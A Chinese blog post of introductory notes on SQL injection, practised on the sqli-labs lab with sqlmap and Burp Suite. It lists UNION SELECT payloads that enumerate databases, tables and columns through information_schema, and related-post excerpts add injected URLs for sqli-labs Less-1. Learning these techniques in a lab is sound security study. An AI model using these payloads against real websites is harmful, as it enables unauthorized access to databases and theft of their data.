SQL基础学习

最新推荐文章于 2024-06-11 21:29:27 发布
最新推荐文章于 2024-06-11 21:29:27 发布
阅读量69 收藏
点赞数 1
分类专栏: web sql-labs 文章标签: mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46599939/article/details/117202825
版权

sql 基础学习(一)

练手:sql-labs
主c :sqlmap
burpsuite辅助

union select 1,2,group_concat(schema_name) from information_schema.schemata //查询数据库名或者用database()

SCHEMATA ――>储数据库名的,

|——>关键字段:SCHEMA_NAME,表示数据库名称

| TABLES ――>存储表名的

|——>关键字段:TABLE_SCHEMA表示表所属的数据库名称;

TABLE_NAME表示表的名称

| COLUMNS ――>存储字段名的

|——>关键字段:TABLE_SCHEMA表示表所属的数据库名称;

TABLE_NAME表示所属的表的名称

COLUMN_NAME表示字段名

可以看到,我们只要通过注射点构造查询语句遍相关字段,就可以得到我们想要的信息了。

爆所有数据名

select group_concat(SCHEMA_NAME) from information_schema.schemata

得到当前库的所有表

select group_concat(table_name) from information_schema.tables where table_schema=xxxxxxx.....
柒是幸运
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入学习(入门)
Maxmalloc的博客
10-07 469
主要借助sqllibs 学习了一下sql注入的大致原理。 sql大致流程都是这样(没试过盲注) 爆库名(通常不需要知道,可以直接调用database()函数),爆表名,爆列名,最后爆数据 所以按照步骤来写sql语句: 爆表名 select group_concat(table_name) from information_schema.tables where table_schema=datab...
SQL注入的一些命令
jkhdjkasd的博客
07-27 1661
sqlmap的常用命令
MySQL的注入总结
a740325713的博客
09-16 486
0x01 MySQL 5.0以上和MySQL 5.0以下版本的区别 MySQL5.0以上版本存在一个叫information_schema的数据库,它存储着数据库的所有信息,其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型和访问权限等。而5.0以下没有。 information_schema 系统数据库,记录当前数据库的数据库,表,...
mysql 常用注入命令_sql注入之必备的基础知识
weixin_36299790的博客
01-26 498
什么是SQL注入(SQL Injection)所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,或作为存储过程的输入参数,这类表单特别容易受到SQL注入式攻击。mysql常用注释#--[空格]或者是--+/*…*/在注意过程中,这些注释可能都需要进行urle...
sql注入——day01
qq_40739219的博客
10-13 110
基本的 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables wheretable_schema = '数据库名' 查列:select column_name from information_schema.columns wheretable_name='表名' 查字段:select 字段名 form 数据库.表名 记得加注释符-- + .
SQL基础学习总结.docx
04-15
SQL基础学习总结.docx【原创田超凡,已申请版权,禁止随意转发,侵权仿冒必究】
SQL 基础学习资料(一)
03-22
SQL 基础学习资料(一)
sql基础学习材料(适合初学者).zip
07-08
SQL (Structured Query Language) 是具有数据操纵和数据定义等多种功能的数据库语言,这种语言具有交互性特点,能为用户提供极大的便利,数据库管理系统应充分利用SQL语言提高计算机应用系统的工作质量与效率。SQL...
Sqli-labs Less-1 题解
Zhuoqian_1的博客
03-11 332
最近学习SQL注入,找了Sqli-labs来练习一下。 Less-1 原页面: 1、题目中参数为id,尝试?id=1 2、尝试单引号注入?id=1' 发现单引号没有被过滤 这个提示为 ''1'' LIMIT 0,1' 注意这个地方是这样看的(按上述颜色,黄色的引号不是数据库查询里的,第一次没看懂QAQ) 3、尝试?id=1' # 这里有个坑,输入#不是把之后注释掉,要用%23 ,目前不知道原因,应该是版本问题。 ?id=1' %23 4、使用union s...
sql注入-union select
热门推荐
我不是大牛
06-24 2万+
什么是SQL注入 SQL注入(Sql Injection ) 是一种将SQL语句插入或添加到应用(用户)的输入参数中的攻击 这些参数传递给后台的SQL数据库服务器加以解析并执行 哪里存在SQL注入? GET POST HTTP头部注入 Cookie注入 任何客户端可控,传递到服务器的变量,并且和数据库进行交互,都有可能存在sql注入。 SQL注入的分类 根据SQL数据类型分类 整型注...
MySQL注入涉及的information_schema库讲解
雷根瓦尔德
11-19 2964
当我们在进行MySQL手工注入的时候,经常要涉及到一个库“infromation_schema”,可能有些朋友在用的时候,对这个库的操作或多或少有些理解,但是细想又不知道怎么说。大概就是知道这样做也挺明白,就是讲不出为啥????。 这篇文章不是讲MySQL注入实战,旨在讲述我们在注入时使用information_schema库主要涉及的一些表,使同为新手的朋友能了解这些语句的用意和意义。我近期挖出并提交...
sql注入总结
wuqiongrj的博客
07-22 7683
本实验测试是基于sqli-labs的实验环境 环境配置:php+mysql 环境搭建请参考 http://www.freebuf.com/articles/web/34619.html   Sql注入定义: 就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行的sql命令的目的   sql注入分类: 基于联
mysql -- 手工注入
Nixawk
04-22 6452
------------------[index1.php源码]------------------ ID: ------------------[index2.php源码]------------------ $con = mysql_connect("localhost","root","fuckyou"); mysql_select_db("mytestdb"
sqli_labs闯关
weixin_45808483的博客
10-27 479
less-1 http://127.0.0.1/sqli-labs/Less-1/?id=1 // 加单引号,查看是否有注入 http://127.0.0.1/sqli-labs/Less-1/?id=1' //查看有多少列 http://127.0.0.1/sqli-labs/Less-1/?id=1' order by 3 --+ // 使id=-1报错,使用联合查找查看那些数据可以回显 http://127.0.0.1/sqli-labs/Less-1/?id=-1' union
mysql-线上常用运维sql-2
jll126的博客
06-11 362
MySQL中,直接查询当前正在执行的事务可能不是非常直观,因为MySQL并没有提供直接的命令或系统视图来列出所有正在运行的事务。但是,你可以通过几种方法间接地获取这些信息。
MySQL】服务器配置和管理
p_fly的博客
06-09 768
MySQL服务器通常说的是mysqld程序。mysqld 是 MySQL 数据库服务器的核心程序,负责处理客户端的请求、管理数据库和执行数据库操作。管理员可以通过配置文件和各种工具来管理和监控 mysqld 服务器的运行本文将介绍下面三个内容:服务器启动选项:可以在命令行和配置文件中指定,用于配置服务器的行为和特性。服务器系统变量:反映了启动选项的当前状态和值,其中一些变量可以在服务器运行时修改。服务器状态变量:包含了关于运行时操作的计数器和统计信息。
Mysql--基础知识点--86--慢查询
Chasing__Dreams的博客
06-11 765
mysql 慢查询
MySQL】索引(上)
最新发布
开心星人的博客
06-11 753
索引是一种用于快速查询和检索数据的数据结构,排序好的数据结构。 优点:加快检索速度;通过创建唯一性索引,可以保证行数据的唯一性;通过索引列对数据进行排序,降低数据排序的成本,降低CPU的消耗 缺点:创建和维护索引需要耗费时间,本身存储也要耗费一定空间不同引擎对索引的支持情况 哈希表、有序数组、B+树、B树、红黑树,二叉树哈希表:只适用于等值查询的场景,用这种索引做不了范围查询,必须全表扫描。查询效率高有序数组:有序数组在等值查询和范围查询场景中的性能就都非常优秀,但是一旦更新数据就得挪动后面的元素,成本太高
sqlserver 学习
10-12
如果你想学习 SQL Server,以下是一些步骤和资源可以帮助你入门: 1. 学习基本概念:了解 SQL Server ...- 书籍:有很多书籍专门介绍 SQL Server 和数据库管理的基础知识,你可以选择一本适合初学者的书籍来学习

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值